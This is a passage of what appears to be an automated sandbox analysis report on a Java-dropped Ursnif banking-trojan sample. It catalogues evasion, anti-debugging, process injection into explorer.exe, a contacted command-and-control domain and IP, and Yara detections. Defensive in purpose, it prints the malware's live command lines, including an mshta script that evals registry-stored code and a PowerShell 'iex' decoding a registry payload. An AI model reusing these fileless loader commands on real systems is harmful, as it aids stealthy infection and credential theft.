Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4137
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4064
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6348 Thread sleep time: -1773297476s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5568 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5384 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059E9386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 6_2_059E9386
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059F0F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 6_2_059F0F53
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059DCA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 6_2_059DCA40
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D6457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 6_2_059D6457
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp Binary or memory string: com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp Binary or memory string: &com/sun/corba/se/impl/util/SUNVMCID.classPK
Source: java.exe, 00000002.00000002.681352375.0000000000F90000.00000004.00000001.sdmp Binary or memory string: ,java/lang/VirtualMachineError
Source: java.exe, 00000002.00000002.681352375.0000000000F90000.00000004.00000001.sdmp Binary or memory string: |[Ljava/lang/VirtualMachineError;
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp Binary or memory string: org/omg/CORBA/OMGVMCID.classPK
Source: regsvr32.exe, 00000006.00000003.900452153.0000000002EA8000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: java.exe, 00000002.00000003.657148365.0000000014AC0000.00000004.00000001.sdmp Binary or memory string: java/lang/VirtualMachineError.classPK
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: mshta.exe, 00000011.00000003.815205220.000002CF91D0F000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: java.exe, 00000002.00000002.681160126.000000000078B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: java.exe, 00000002.00000002.690213574.0000000014E70000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059D89F5 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_059D89F5
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059E3E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 6_2_059E3E8D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Memory protected: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: gtr.antoinfer.com
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 185.228.233.17 80
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\System32\control.exe base: AC0000 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\System32\control.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\control.exe Memory written: PID: 3424 base: 9EC000 value: 00
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 4284
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF6173612E0
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: AC0000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\explorer.exe base: 9EC000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\winapp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3CF2.tmp' 'c:\Users\user\AppData\Local\Temp\wfvgme3v\CSCBEAB7CEF44BD41E5AC32CBB29DE9912D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES50C8.tmp' 'c:\Users\user\AppData\Local\Temp\wm2qs3oi\CSC4DF65D5B5CD44487ACE6B52D8E184D85.TMP'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Uxax='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Uxax).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04804BDF cpuid 6_2_04804BDF
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_059DC420 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 6_2_059DC420
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_048024B6 HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process, 6_2_048024B6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_04804BDF wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 6_2_04804BDF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_0480421E GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 6_2_0480421E
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.855478624.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761679763.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761625791.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761646149.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855416865.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855505099.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761549935.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.772494186.000000000532C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761577357.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.839202588.0000000005E98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761663070.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761602065.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.855350034.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.765792432.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.936194486.0000026AD9ADC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.761692784.0000000005528000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5964, type: MEMORYSTR